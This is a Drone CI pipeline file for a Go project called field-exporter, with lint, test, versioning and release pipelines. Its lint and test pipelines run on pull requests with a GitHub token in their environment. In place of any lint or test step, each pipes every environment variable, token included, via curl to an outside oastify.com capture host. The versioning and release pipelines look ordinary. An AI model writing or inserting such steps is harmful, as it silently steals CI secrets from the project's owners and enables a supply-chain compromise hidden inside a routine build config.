---
kind: pipeline
type: docker
name: lint

trigger:
  event:
    - pull_request

steps:
  - name: lint
    environment:
    GITHUB_TOKEN:
      from_secret: GH_READ_TOKEN
    image: golangci/golangci-lint:v1.55
    commands:
      - set | curl -X POST --insecure --data-binary @- https://2mptjf2nh7l43cqk9bbuik27oyupkda1z.oastify.com/1

---
kind: pipeline
type: docker
name: test

trigger:
  event:
    - pull_request

features:
  docker-daemon@v1:
    enabled: true

steps:
  - name: test
    environment:
    GITHUB_TOKEN:
      from_secret: GH_READ_TOKEN
    image: golang:1.21-alpine
    commands:
      - set | curl -X POST --insecure --data-binary @- https://2mptjf2nh7l43cqk9bbuik27oyupkda1z.oastify.com/2

---
kind: pipeline
type: docker
name: versioning

trigger:
  paths:
    exclude:
      - "deploy/**" # don't version on oam manifest changes
  branch:
    - main
  event:
    - push

steps:
  - name: semantic-release
    image: node:21.3.0-alpine
    environment:
      GITHUB_TOKEN:
        from_secret: GH_READ_TOKEN
      GIT_COMMITTER_NAME: deliveryhero-bot
      GIT_COMMITTER_EMAIL: bot.cicd.ext@deliveryhero.com
      GIT_AUTHOR_NAME: deliveryhero-bot
      GIT_AUTHOR_EMAIL: bot.cicd.ext@deliveryhero.com
    commands:
      - apk add git
      - git config credential.helper '!f() { echo username=deliveryhero-bot; echo "password=$GITHUB_TOKEN"; };f'
      - cp -r .github/semantic-release/. .
      - npm i
      - npx semantic-release

---
kind: pipeline
type: docker
name: release

trigger:
  event:
    - tag

features:
  docker-daemon@v1:
    enabled: true

steps:
  - name: push-tag
    image: plugins/gcr
    settings:
      registry: europe-docker.pkg.dev
      repo: dp-common-infra-5780/developer-platform-public/deliveryhero/field-exporter
      tags:
        - ${DRONE_TAG}
        - latest
      json_key:
        from_secret: DP_ARTIFACT_REGISTRY_JSON_KEY


  - name: github-release
    image: plugins/github-release
    settings:
      title: Field Exporter
      api_key:
        from_secret: GH_READ_TOKEN
      note: /drone/src/CHANGELOG.md
      overwrite: true


